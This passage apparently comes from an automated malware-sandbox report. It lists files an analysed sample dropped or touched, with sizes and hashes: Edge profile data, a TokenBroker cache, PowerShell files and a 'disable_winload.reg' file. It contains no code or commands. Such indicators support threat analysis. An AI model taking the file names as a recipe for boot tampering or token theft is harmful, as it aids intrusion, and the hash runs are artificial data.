SHA512406ac644862c2f33cb61149ad12bcf47240f4d729920c4dc44899d57d2d3ce2941d46ff1c955a2ac1788ea430d7f2ed1ca5ef0e584a2ea2d123edbc4a84e513e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\ShortcutsFilesize
20KB
MD5fca621466ede4c2499ecb9f3728e63ab
SHA13d5d4cd0fa702371f9d1a40e72e1fe19d194a3c4
SHA256c6dde84fb40fb69d1a6637fe6bf781de51a4c24e45b616e8f97afd3c6fe200b8
SHA512aa12ed8c1ff85af4375ac80d7fe494d6f8a70ddb3357c186a0c1ade9bbcc3efc3de5fb0ad4b81eb2ab9bc916b6adf8b76c30203f78e38cd00af5fa4ccf3e3760
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOGFilesize
350B
MD5ef957349084b1173d0f33b468efc601d
SHA11e069fd2d51ac5ce15ed6bb97a5b7bb1d5540b09
SHA256a65bb55d4dfec9f4a2dd0a69311d665ad93931edf2fb4c7ec5ef3d9868e30edb
SHA512bcec4780ca242d69bc26f8fed2b090267b94172ab5452edf3670411b8744a304b946fd0c27fa478497bc736a2ef2b1feb54d2553c7bd4a29832c3fb116bd02e4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOGFilesize
323B
MD563f20def912eb16310eb9d8ac6cc291a
SHA1706aacceca8e02d575f0c9d83280cf1caa68ae86
SHA256b7af2545f0427b0839da8ff0ae3ba98a7ff564635d9d207ebe295ae922819991
SHA5121cc3e69cfdaa3c29aeec77dc34059b3b71bbb3a96345787dc6c16a8da5fffb1ad923686b707bab425fa79e03b624cdc4851a9f1a1e0f2829d4a03965f4399346
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited LinksFilesize
128KB
MD5aced0e90b7e2b2f643e4d7710ced39d7
SHA1ede1baa9d1f4730a12108c26092e104c11b880b7
SHA25662173dfe01638bcb5fde58dbce6a4f04920435c9f67a80220e5915daa622ce51
SHA51265dc2199f789207a116a9c6613611a4ec9bd0aa74a76d8272ae4e71781f6d6b2e1ec39aaa2dacc21e76e1b3228cc19305ae49d071a2189d948ed6ff6a9e030d9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOGFilesize
198B
MD5f70f01a098339f4ac0622a52ed61812a
SHA1c4782d14eea2a3b359fe8a72e1d20a1a863eab69
SHA256d649000d5785eb36d69ee316a5c7f59fe8d46fada951aa69ce5bee95cccb47c1
SHA512a1c7e6cc65be38ffe527a17692def01fb9019ff5b770e619a4e054cbc4304753bdc37ece26b543b52f8355050f169abd5be13bc3ed8bfd936982df701b0baec9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002Filesize
50B
MD522bf0e81636b1b45051b138f48b3d148
SHA156755d203579ab356e5620ce7e85519ad69d614a
SHA256e292f241daafc3df90f3e2d339c61c6e2787a0d0739aac764e1ea9bb8544ee97
SHA512a4cf1f5c74e0df85dda8750be9070e24e19b8be15c6f22f0c234ef8423ef9ca3db22ba9ef777d64c33e8fd49fada6fcca26c1a14ba18e8472370533a1c65d8d0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.dbFilesize
16KB
MD59e02552124890dc7e040ce55841d75a4
SHA1f4179e9e3c00378fa4ad61c94527602c70aa0ad9
SHA2567b6e4ce73ddd8b5e7a7c4a94374ac2815d0048a5296879d7659a92ee0b425c77
SHA5123e10237b1bff73f3bb031f108b8de18f1b3c3396d63dfee8eb2401ce650392b9417143a9ef5234831d8386fc12e232b583dd45eada3f2828b3a0a818123dd5cd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-walFilesize
177KB
MD5d618b67097f828d2010fb5d0e74c987b
SHA192d6a39b730af8840981376bf76d5d3e548d26be
SHA256c937b2128e77baa1c4b4a49dd34b55bfafe53327a7c7b738a3ddec9cc6c85eea
SHA512bec24f5fdeef2bab04b0b327c93466706004b61cb71c41d8924aac230c24210be915a9cc366bd99a8a169e8648dcd5f026d8fa567a8815c1bd96b362fbddffe1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.logFilesize
187B
MD54a890675ec63575da12a3d09af0f43d3
SHA1bc585ed72198351d66a9f220c6d3a69be5621aac
SHA2565bb3df7918d2009ad79929503414ae654579fd0b1d74d08a5fb075c99f40cca4
SHA512e9c20c911b1754ee30cb49e1a8aed4778aa71903a88f41d328491ffab194a629d0217ef8db13b5083c36a604d3f92bf5838b1e06b635f87ed0921eddefc97ac4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOGFilesize
319B
MD549a1201fb21226aa0b7532c55ff4fd40
SHA1e5dc6fe907a74a179c09601032fcff399b7da34c
SHA256504244d42c624f630adc0195634019943e67bd3b0bfa0dc2010084020fe61744
SHA512261d8cacf42e4a869d6587ef8cdc9c454ea089dc01f80534c12f1cfba007727b1eae90666a6a340ba3db98561340113e234e199b452636d34c272fd12d8c0c9d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.logFilesize
594B
MD5c7d82d3c20338e91384c159a989d5f5d
SHA15f82f9fcee48e891e631e08d6d87f6fe865112e0
SHA256cb2ccf6b13d83d16ff65945d363ae269221da8db017ca6b36c446a1850ffa8dc
SHA5126c93b4afdb047d68ef49a363b6f191fe5eee4bde198c92e07d044b599a4371162decf2f5ad12109dedcd0a17a84a1ecc32108cd5419894a8f26b2cb818f6143e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOGFilesize
337B
MD56afccce754297e5dd3754727e80b6f77
SHA1f8768cc0093d26f2b3f8c8fd6759ddb5a97c8146
SHA2561b6ba353c9a64f570ebc1e05d92d77cda177fee5cfb75261294c6068e7c5cd68
SHA512caf68f23973f83328fa8a25f8088549efad0e11eec5fd832e80fb8efe626316266eaf9f4764d789dfca18f72a97f4f579283d820a3c32512dd956bdea5c1884f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0Filesize
44KB
MD5163c653b1952e9b1bf710cfa65b5f1dc
SHA11d11c24fafda3672f6a344a035030d05b67592f1
SHA25678250de0ec0be72a0642661609cf2be39e67692cfdc489ff8eddb637d21961ce
SHA512b7f0f0d1976a721fef2de80602692c85cdfa2c90c2578e55bbeaab8bc9f1597ab190e22817db913d97760b6409b8458bcb0c4460de53df8b651825f98fa369f5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1Filesize
264KB
MD54e5be79cdb248e2b5e9332d9fe38150c
SHA162bf86f0dd94a1ec05ade46a724655e071c40a49
SHA256a237bf0d3828972604b93b6398ed01c8ab7a33e51887158d5061eae334899d22
SHA512b76b4b669d69a8088a2a7d88f47356360d2126c106f97670429ba4665385c6d143aa7593f8292303c45d93330b0a0de86d34cb58e780810dc9bddcb6282bf658
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3Filesize
4.0MB
MD5019e334057588087a1d13e80727ba10c
SHA18b6ba62e627c2a51dfc7c4d45c4087a0182987c8
SHA2569f776bd8e4cc46effb0505b3ea9effc65640da9ce25e59c99e91deebb60191e1
SHA5126b2a68cd247360071b2e49b8ab0f4eb996c0eeaf07d4cf2cfb3297474bfed267f944847ebc5c45643658154b7029ad041ae1a5619c2aae4f0ca09e4a2f0ea802
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last BrowserFilesize
120B
MD5a397e5983d4a1619e36143b4d804b870
SHA1aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4
SHA2569c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4
SHA5124159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last VersionFilesize
11B
MD5838a7b32aefb618130392bc7d006aa2e
SHA15159e0f18c9e68f0e75e2239875aa994847b8290
SHA256ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA5129e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5e45df01867921c09147ebc838115ded7
SHA190837a17acb4e9743ebf6a51a82613bc4d4355c5
SHA2560835b8a3af2c6c7ab59c6ec20bce4124878623516d5a8de35c5045f1fb806d5f
SHA512a6849314e2c4366f88a9fa31c0c0f7dae002c531ea4d3b1ef775d7b3c7b707d976d48269833582accf3bb3fc662d609b0563fff6f215ce626e1069455d540cd0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5f550c380dd1cbf3b0146563aeffaebbc
SHA1e2d442e87bc6692169d08b0a69a1b4503bb41440
SHA2569026f1f45c4bcf18e75f5dbb498f9a1546530d03ea5cbdb7bef84ad580aa9de4
SHA5129fc806088796fef3d3c9fd7f698dcca2155714e81526ff727c035a9a798fbe612d3553090a74df14c5d181a75e98c95b79da96034765e04a072d7bac43384a28
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbresFilesize
4KB
MD51eaa1674380df2e85f948ab3645b6a2d
SHA1cca11a2d973150990fd8bafea1cecbfee1fd5704
SHA256e6a07e925e9e14279a6ea3124c2018e090beca3ebfbc78e714c605786e3e9388
SHA512beb83f8f9e8371581eee4f4b18a4386532c4777acf5e7c4aae92226401f49a68876179121f0fd9993878cc003da814ac6e86f5a64d3f156256492ccb7a907ee3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e3b90537044a639dc6154f7eba9c8404
SHA1dec8d4d8f0a9a8866babb6f17dd68d8a54e7f47a
SHA256e0df7204949b2bf43825bfed4b611728bcf2683aabb280d4b4342a75cab34662
SHA5123ad09f527b0475c847881c916e4f3854e3846e86b699f9194318ccda9b75af18cb7b02e6127f98ea17872cc6fe6f6731e73cbd39177bf56a3561450aebf463d6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dlw4m3ai.1ny.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\disable_winload.regFilesize
91B
MD547b5ae368c4aff20eafa90ffdcd03a34
SHA1dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81
SHA256aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07
SHA512c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.dbFilesize
1024KB
MD5b0bcb925d85cd65cc926570d3dfed96e
SHA123c123a744528fbd7325a597ebbc7c75e6ea853d
SHA256cb215908a1c883d3cfb7ed6157d42af6da3a8fcf5993f3f3d582c5f7ec683d23
SHA512a0037f1ef86a4c2eeef6b19de16d6d71eff35aaff9daedfbc7f8227305d8acc8d36e119c590ef1ca6d3a25e2bbb0b6e91202ec93c1b22e7b961e00e839d8ba94
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
7KB
MD5a1dfdeb0848c46179d0d882ffe23d376
SHA18d52d9199d3bd2b12ba714fcf978eb7e44e46d07
SHA256aeeeb2061f29f4e7633b58063d231debddb3110fde08ecf97bc25b76dcf491b0
SHA512aba22cbaeb799cfea34c3a0a9c4a5d6822e40622f52df061097b5e77cc5cb329f75b8c7ae654b8f0944f4fbf2ba2d63f6352693fafb9cd11bb1df3fb249a62aa
-
\??\pipe\LOCAL\crashpad_4844_NVNBMRQCICKMXHHCMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/2692-5-0x0000016E53E70000-0x0000016E53E92000-memory.dmpFilesize
136KB